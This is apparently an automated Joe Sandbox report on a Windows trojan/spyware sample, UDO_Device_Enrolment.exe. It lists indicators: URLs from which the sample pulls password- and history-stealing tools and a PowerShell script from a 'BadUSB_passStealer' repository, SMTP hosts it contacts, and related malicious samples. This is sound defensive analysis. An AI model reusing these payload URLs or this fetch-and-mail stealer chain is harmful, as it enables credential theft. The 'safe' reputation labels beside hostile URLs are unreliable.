http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://pki.goog/gsr2/GTSGIAG3.crt0)	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0#	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/F	0%	URL Reputation	safe
http://www.fontbureau.com(	0%	Avira URL Cloud	safe
https://aefd.nelreports.net/api/report?cat=bingth	0%	URL Reputation	safe
https://raw.githubusercontent.com/tuconnaisyouknow/BadUSB_passStealer/main/other_files/WebBrowserPas	0%	Avira URL Cloud	safe
http://raw.githubusercontent.com	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com	0%	Avira URL Cloud	safe
http://www.goodfont.co.krx	0%	Avira URL Cloud	safe
http://www.ascendercorp.com/typedesigners.htmlm	0%	Avira URL Cloud	safe
http://www.ascendercorp.com/typedesigners.htmlH	0%	Avira URL Cloud	safe
https://github.comx	0%	Avira URL Cloud	safe
http://www.monotype.1	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/tuconnaisyouknow/BadUSB_passStealer/main/other_files/fin.ps1	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
github.com	140.82.121.4	true	false	high
raw.githubusercontent.com	185.199.108.133	true	false	unknown
svc.ha-smtp.live.com	52.97.188.70	true	false	high
smtp-mail.outlook.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://github.com/tuconnaisyouknow/BadUSB_passStealer/raw/main/other_files/WebBrowserPassView.exe	false		high
https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WebBrowserPassView.exe?raw=true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate	bhvFCA.tmp.1.dr	false		high
http://www.goodfont.co.krx	UDO_Device_Enrolment.exe, 00000000.00000003.254361071.000000001D28E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/static/images/folder-applications.svg	bhvFCA.tmp.1.dr	false		high
https://www.google.com/chrome/static/css/main.v2.min.css	bhvFCA.tmp.1.dr	false		high
https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg	bhvFCA.tmp.1.dr	false		high
http://www.ascendercorp.com/typedesigners.htmlH	UDO_Device_Enrolment.exe, 00000000.00000003.256196355.000000001D283000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.256283828.000000001D284000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.256417856.000000001D286000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.256353935.000000001D283000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com	bhvFCA.tmp.1.dr	false		high
http://www.fontbureau.com/designers	UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.nirsoft.net	WebBrowserPassView.exe, 00000001.00000002.286255097.0000000000193000.00000004.00000010.00020000.00000000.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	bhvFCA.tmp.1.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/static/images/chrome-logo.svg	bhvFCA.tmp.1.dr	false		high
https://www.google.com/chrome/static/images/homepage/homepage_features.png	bhvFCA.tmp.1.dr	false		high
https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=	WebBrowserPassView.exe, 00000001.00000003.280989815.0000000002303000.00000004.00000800.00020000.00000000.sdmp, bhvFCA.tmp.1.dr	false		high
https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png	bhvFCA.tmp.1.dr	false		high
http://www.sajatypeworks.com	UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/chrome/	bhvFCA.tmp.1.dr	false		high
http://www.founder.com.cn/cn/cThe	UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f	bhvFCA.tmp.1.dr	false		high
https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png	bhvFCA.tmp.1.dr	false		high
http://www.fontbureau.com(	UDO_Device_Enrolment.exe, 00000000.00000003.257710414.000000001D28F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg	bhvFCA.tmp.1.dr	false		high
https://maps.windows.com/windows-app-web-link	bhvFCA.tmp.1.dr	false		high
http://smtp-mail.outlook.com	UDO_Device_Enrolment.exe, 00000000.00000002.334709433.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.msn.com/?ocid=iehp	WebBrowserPassView.exe, 00000001.00000003.280989815.0000000002303000.00000004.00000800.00020000.00000000.sdmp, bhvFCA.tmp.1.dr	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166	WebBrowserPassView.exe, 00000001.00000003.285907388.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, WebBrowserPassView.exe, 00000001.00000003.280989815.0000000002303000.00000004.00000800.00020000.00000000.sdmp, bhvFCA.tmp.1.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3	bhvFCA.tmp.1.dr	false		high
https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn	bhvFCA.tmp.1.dr	false		high
http://crl.pki.goog/GTS1O1core.crl0	bhvFCA.tmp.1.dr	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0	UDO_Device_Enrolment.exe, 00000000.00000003.255814500.000000001D290000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WebBrowserPassView.exe?	UDO_Device_Enrolment.exe, 00000000.00000002.333375877.0000000002880000.00000004.00000800.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.333296023.0000000002855000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/(	UDO_Device_Enrolment.exe, 00000000.00000003.255985516.000000001D292000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.255814500.000000001D290000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.255913992.000000001D290000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/chrome/static/images/icon-announcement.svg	bhvFCA.tmp.1.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c	WebBrowserPassView.exe, 00000001.00000003.285907388.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, WebBrowserPassView.exe, 00000001.00000003.281128881.000000000230E000.00000004.00000800.00020000.00000000.sdmp, WebBrowserPassView.exe, 00000001.00000003.281828034.00000000029D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.nirsoft.net/	WebBrowserPassView.exe, WebBrowserPassView.exe, 00000001.00000000.266559756.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe, 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe.0.dr	false		high
http://www.zhongyicts.com.cn	UDO_Device_Enrolment.exe, 00000000.00000003.255233873.000000001D290000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.255307376.000000001D290000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	UDO_Device_Enrolment.exe, 00000000.00000002.331804384.0000000002546000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png	bhvFCA.tmp.1.dr	false		high
http://svc.ha-smtp.live.com	UDO_Device_Enrolment.exe, 00000000.00000002.334709433.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/static/css/main.v3.min.css	bhvFCA.tmp.1.dr	false		high
http://www.jiyu-kobo.co.jp/.TTC	UDO_Device_Enrolment.exe, 00000000.00000003.255913992.000000001D290000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://render.githubusercontent.com	UDO_Device_Enrolment.exe, 00000000.00000002.333752118.0000000002932000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/chrome/application/x-msdownloadC:	bhvFCA.tmp.1.dr	false		high
https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg	bhvFCA.tmp.1.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee	bhvFCA.tmp.1.dr	false		high
https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WNetWatcher.exe?raw=tru	UDO_Device_Enrolment.exe, UDO_Device_Enrolment.exe, 00000000.00000002.332722721.0000000002727000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/static/images/download-browser/pixel_phone.png	bhvFCA.tmp.1.dr	false		high
http://pki.goog/gsr2/GTS1O1.crt0	bhvFCA.tmp.1.dr	false	URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	bhvFCA.tmp.1.dr	false		high
https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml	bhvFCA.tmp.1.dr	false		high
https://raw.githubusercontent.com/tuconnaisyouknow/BadUSB_passStealer/main/other_files/WebBrowserPas	UDO_Device_Enrolment.exe, 00000000.00000002.333752118.0000000002932000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/static/images/app-store-download.png	bhvFCA.tmp.1.dr	false		high
http://www.jiyu-kobo.co.jp/F	UDO_Device_Enrolment.exe, 00000000.00000003.256055155.000000001D291000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.256026004.000000001D290000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.255814500.000000001D290000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.255913992.000000001D290000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png	bhvFCA.tmp.1.dr	false		high
http://www.fontbureau.comlic	UDO_Device_Enrolment.exe, 00000000.00000003.261819152.000000001D291000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contextual.media.net/	bhvFCA.tmp.1.dr	false		high
https://pki.goog/repository/0	bhvFCA.tmp.1.dr	false	URL Reputation: safe	unknown
http://en.w	UDO_Device_Enrolment.exe, 00000000.00000003.255554871.000000001D294000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9	bhvFCA.tmp.1.dr	false		high
http://www.carterandcone.coml	UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.msn.com/	bhvFCA.tmp.1.dr	false		high
http://www.founder.com.cn/cn/	UDO_Device_Enrolment.exe, 00000000.00000003.254874425.000000001D290000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.254816640.000000001D28A000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.254397242.000000001D283000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734	bhvFCA.tmp.1.dr	false		high
http://www.fontbureau.com/designers/frere-jones.html	UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cna	UDO_Device_Enrolment.exe, 00000000.00000003.255233873.000000001D290000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.255307376.000000001D290000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.monotype.1	UDO_Device_Enrolment.exe, 00000000.00000003.258984273.000000001D2B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://raw.githubusercontent.com	UDO_Device_Enrolment.exe, 00000000.00000002.333840861.0000000002985000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674	bhvFCA.tmp.1.dr	false		high
https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg	bhvFCA.tmp.1.dr	false		high
http://www.ascendercorp.com/typedesigners.htmlm	UDO_Device_Enrolment.exe, 00000000.00000003.256196355.000000001D283000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/(	UDO_Device_Enrolment.exe, 00000000.00000003.256055155.000000001D291000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.256026004.000000001D290000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.256206206.000000001D290000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg	bhvFCA.tmp.1.dr	false		high
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804	bhvFCA.tmp.1.dr	false		high
https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3	bhvFCA.tmp.1.dr	false		high
http://raw.githubusercontent.com	UDO_Device_Enrolment.exe, 00000000.00000002.333840861.0000000002985000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/48/nrrV18753.js	bhvFCA.tmp.1.dr	false		high
https://www.google.com/chrome/static/images/fallback/icon-help.jpg	bhvFCA.tmp.1.dr	false		high
https://github.comx	UDO_Device_Enrolment.exe, 00000000.00000002.333375877.0000000002880000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/accounts/servicelogin	WebBrowserPassView.exe	false		high
https://www.google.com/chrome/static/images/homepage/google-enterprise.png	bhvFCA.tmp.1.dr	false		high
https://www.google.com/chrome/static/images/homepage/google-dev.png	bhvFCA.tmp.1.dr	false		high
https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json	bhvFCA.tmp.1.dr	false		high
http://crl.pki.goog/gsr2/gsr2.crl0?	bhvFCA.tmp.1.dr	false	URL Reputation: safe	unknown
http://pki.goog/gsr2/GTSGIAG3.crt0)	bhvFCA.tmp.1.dr	false	URL Reputation: safe	unknown
https://raw.githubusercontent.com/tuconnaisyouknow/BadUSB_passStealer/main/other_files/fin.ps1	UDO_Device_Enrolment.exe, UDO_Device_Enrolment.exe, 00000000.00000002.332722721.0000000002727000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/	bhvFCA.tmp.1.dr	false		high
https://www.google.com/chrome/static/images/fallback/icon-fb.jpg	bhvFCA.tmp.1.dr	false		high
https://www.google.com/chrome/static/images/mac-ico.png	bhvFCA.tmp.1.dr	false		high
http://www.fontbureau.com/designersG	UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/BrowsingHistoryView.exe	UDO_Device_Enrolment.exe, UDO_Device_Enrolment.exe, 00000000.00000002.332722721.0000000002727000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pki.goog/gsr2/GTS1O1.crt0#	bhvFCA.tmp.1.dr	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/F	UDO_Device_Enrolment.exe, 00000000.00000003.255985516.000000001D292000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aefd.nelreports.net/api/report?cat=bingth	bhvFCA.tmp.1.dr	false	URL Reputation: safe	unknown
https://github.com	UDO_Device_Enrolment.exe, 00000000.00000002.333752118.0000000002932000.00000004.00000800.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.333375877.0000000002880000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.199.108.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	false
52.97.188.70	svc.ha-smtp.live.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
140.82.121.4	github.com	United States	36459	GITHUBUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	709523
Start date and time:	2022-09-25 20:28:08 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	UDO_Device_Enrolment.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.spyw.winEXE@3/4@4/3
EGA Information:	Successful, ratio: 50%
HDC Information:	Failed
HCA Information:	Successful, ratio: 99% Number of executed functions: 119 Number of non-executed functions: 156
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com
Execution Graph export aborted for target UDO_Device_Enrolment.exe, PID 588 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: UDO_Device_Enrolment.exe

Simulations

Behavior and APIs

Time	Type	Description
20:29:17	API Interceptor	188x Sleep call for process: UDO_Device_Enrolment.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.199.108.133	c2EveWZwRO.exe	Get hash	malicious	Browse
	wWiooekKLI.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	824NRLgCTo.exe	Get hash	malicious	Browse
	O08D6FVtib.exe	Get hash	malicious	Browse
	gYUMXbB8Y8.exe	Get hash	malicious	Browse
	POxRxyG2pu.exe	Get hash	malicious	Browse
	CUo6M27pVb.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Jatommy.7.878.15551.31279.exe	Get hash	malicious	Browse
	SDD_ODEQ_0912022_FINAL.docx	Get hash	malicious	Browse
	LpKbeAIr4G.exe	Get hash	malicious	Browse
	LByLuqdaX5.exe	Get hash	malicious	Browse
	ddvmzkRbq5.exe	Get hash	malicious	Browse
	UdXIKaPD9z.exe	Get hash	malicious	Browse
	yUypqrFWkF.exe	Get hash	malicious	Browse
	1PlhXWcR2P.exe	Get hash	malicious	Browse
	FxP8sitDiJ.exe	Get hash	malicious	Browse
	Uumw8yIeNQ.exe	Get hash	malicious	Browse
	8611A15B54E87872C3CDCAF8AE2B8B972FFAFF5641132.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
140.82.121.4	RfORrHIRNe.doc	Get hash	malicious	Browse	github.com/ssbb36/stv/raw/main/5.mp3

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
github.com	ITSBi3J3ws.exe	Get hash	malicious	Browse	140.82.121.3
	Oya6cSyAWh.exe	Get hash	malicious	Browse	140.82.121.4
	QQNkZaudJn.exe	Get hash	malicious	Browse	140.82.121.4
	bG2CKwOjJk.exe	Get hash	malicious	Browse	140.82.121.3
	I1KSIDPLWw.exe	Get hash	malicious	Browse	140.82.121.4
	file.exe	Get hash	malicious	Browse	140.82.121.4
	file.exe	Get hash	malicious	Browse	140.82.121.4
	09d9bb25f1d1bd6f7c3e3aa64df49eaa398e9f26b198e.exe	Get hash	malicious	Browse	140.82.121.3
	cficZrg8Yg.exe	Get hash	malicious	Browse	140.82.121.3
	40a510dd9933e02e51e62b91d854aaa2612c41b4bbb99.exe	Get hash	malicious	Browse	140.82.121.4
	bnilOI7yCo.exe	Get hash	malicious	Browse	140.82.121.3
	pRnHCEhxuo.exe	Get hash	malicious	Browse	140.82.121.3
	c2EveWZwRO.exe	Get hash	malicious	Browse	140.82.121.4
	file.exe	Get hash	malicious	Browse	140.82.121.4
	f090029ecd2264b984721ed50bf04094fcf183311b879.exe	Get hash	malicious	Browse	140.82.121.4
	ac200dfd46cb14b4c59f30198d261a64a5a90972ec043.exe	Get hash	malicious	Browse	140.82.121.4
	FsAkJLRMJu.exe	Get hash	malicious	Browse	140.82.121.4
	7P614s7UK7.exe	Get hash	malicious	Browse	140.82.121.3
	ntacAnBFYn.exe	Get hash	malicious	Browse	140.82.121.4
	wWiooekKLI.exe	Get hash	malicious	Browse	140.82.121.3
raw.githubusercontent.com	viJeC23o5c.exe	Get hash	malicious	Browse	185.199.110.133
	c2EveWZwRO.exe	Get hash	malicious	Browse	185.199.108.133
	ntacAnBFYn.exe	Get hash	malicious	Browse	185.199.109.133
	wWiooekKLI.exe	Get hash	malicious	Browse	185.199.108.133
	JlQpI6Src5.exe	Get hash	malicious	Browse	185.199.109.133
	file.exe	Get hash	malicious	Browse	185.199.108.133
	824NRLgCTo.exe	Get hash	malicious	Browse	185.199.108.133
	file.exe	Get hash	malicious	Browse	185.199.108.133
	O08D6FVtib.exe	Get hash	malicious	Browse	185.199.108.133
	file.exe	Get hash	malicious	Browse	185.199.110.133
	1stOQAhUrG.exe	Get hash	malicious	Browse	185.199.109.133
	gYUMXbB8Y8.exe	Get hash	malicious	Browse	185.199.108.133
	bojtsJdqbh.exe	Get hash	malicious	Browse	185.199.108.133
	https://github.com/sgrfbnfhgrhthr/csdvmghfmgfd/raw/main/Zoom.zip	Get hash	malicious	Browse	185.199.109.133
	POxRxyG2pu.exe	Get hash	malicious	Browse	185.199.108.133
	71363327.exe	Get hash	malicious	Browse	185.199.110.133
	XP8xfZvblw.exe	Get hash	malicious	Browse	185.199.111.133
	CUo6M27pVb.exe	Get hash	malicious	Browse	185.199.108.133
	eab6a350.exe	Get hash	malicious	Browse	185.199.110.133
	SecuriteInfo.com.Variant.Jatommy.7.878.15551.31279.exe	Get hash	malicious	Browse	185.199.108.133

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	x86_64-20220925-1655.elf	Get hash	malicious	Browse	40.119.36.228
	u17nSHiCpV.exe	Get hash	malicious	Browse	40.93.212.0
	2lohkCOZZd.exe	Get hash	malicious	Browse	52.101.40.29
	BS5mMj6Dtw.exe	Get hash	malicious	Browse	104.47.53.36
	IY58E2CfxU.elf	Get hash	malicious	Browse	20.151.177.159
	o8xGwc7aHa.elf	Get hash	malicious	Browse	40.127.68.107
	VHREKz0Pnw.elf	Get hash	malicious	Browse	13.65.160.214
	c2EveWZwRO.exe	Get hash	malicious	Browse	40.93.207.1
	YnUbUPiuP4.exe	Get hash	malicious	Browse	40.93.207.0
	iJdKLLB5mm.elf	Get hash	malicious	Browse	20.206.79.18
	8MWwBW13Ag.elf	Get hash	malicious	Browse	20.168.41.118
	E3wv8xphV8.elf	Get hash	malicious	Browse	20.163.83.185
	Vs3ASR82uv.elf	Get hash	malicious	Browse	20.206.79.18
	TpAENPmctQ.elf	Get hash	malicious	Browse	20.168.34.215
	ak.mpsl-20220924-1810.elf	Get hash	malicious	Browse	102.37.97.108
	ac200dfd46cb14b4c59f30198d261a64a5a90972ec043.exe	Get hash	malicious	Browse	104.47.53.36
	MKSQ30QqoA.elf	Get hash	malicious	Browse	20.184.107.58
	UDeAF2I4uY.elf	Get hash	malicious	Browse	20.42.80.143
	KREZopxwSW.elf	Get hash	malicious	Browse	20.126.185.141
	qoOjaTj6og.elf	Get hash	malicious	Browse	40.74.114.101
FASTLYUS	viJeC23o5c.exe	Get hash	malicious	Browse	185.199.110.133
	22.09.2022_siparis_listemiz.xls	Get hash	malicious	Browse	185.199.108.153
	22.09.2022_siparis_listemiz.xls	Get hash	malicious	Browse	185.199.108.153
	01.06.2023_Genel_Siparislerimiz.xlsx	Get hash	malicious	Browse	185.199.108.153
	sN1Q4wiNsU.xls	Get hash	malicious	Browse	185.199.108.153
	AJ02rF3bui.xls	Get hash	malicious	Browse	185.199.108.153
	sN1Q4wiNsU.xls	Get hash	malicious	Browse	185.199.109.153
	AJ02rF3bui.xls	Get hash	malicious	Browse	185.199.109.153
	BU1AH7byg8.exe	Get hash	malicious	Browse	23.185.0.3
	c2EveWZwRO.exe	Get hash	malicious	Browse	185.199.108.133
	ntacAnBFYn.exe	Get hash	malicious	Browse	185.199.109.133
	wWiooekKLI.exe	Get hash	malicious	Browse	185.199.108.133
	bAuiCxmAoF.exe	Get hash	malicious	Browse	151.101.12.193
	JlQpI6Src5.exe	Get hash	malicious	Browse	185.199.109.133
	file.exe	Get hash	malicious	Browse	185.199.108.133
	21ba0d0c.exe	Get hash	malicious	Browse	151.101.112.193
	824NRLgCTo.exe	Get hash	malicious	Browse	185.199.108.133
	O08D6FVtib.exe	Get hash	malicious	Browse	185.199.108.133
	https://securedfaxdocumented.taplink.ws/	Get hash	malicious	Browse	151.101.66.217
	https://bit.ly/3RE0OcC	Get hash	malicious	Browse	151.101.1.230

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	PO7484HT-83783738TIMANO-EXPORT-CO.,LTD-BULK O.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	6b364eb7.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	6e794e33.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	ME4K5j0nfw.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	22.09.2022_siparis_listemiz.xls	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	sN1Q4wiNsU.xls	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	AJ02rF3bui.xls	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	BU1AH7byg8.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	96BDE735FBD7B9D8490B2356F4761E2ED4B525ED9BFAB.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	bAuiCxmAoF.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	84759ed1.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	21ba0d0c.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	fqE16yTomJ.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	Morpheus (3).bat	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	Morpheus (2).bat	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	Morpheus.bat	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	Morpheus.bat	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	aJnqsDVPGh.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	Bill-ID0574.bat	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	remit2022.html	Get hash	malicious	Browse	185.199.108.133 140.82.121.4

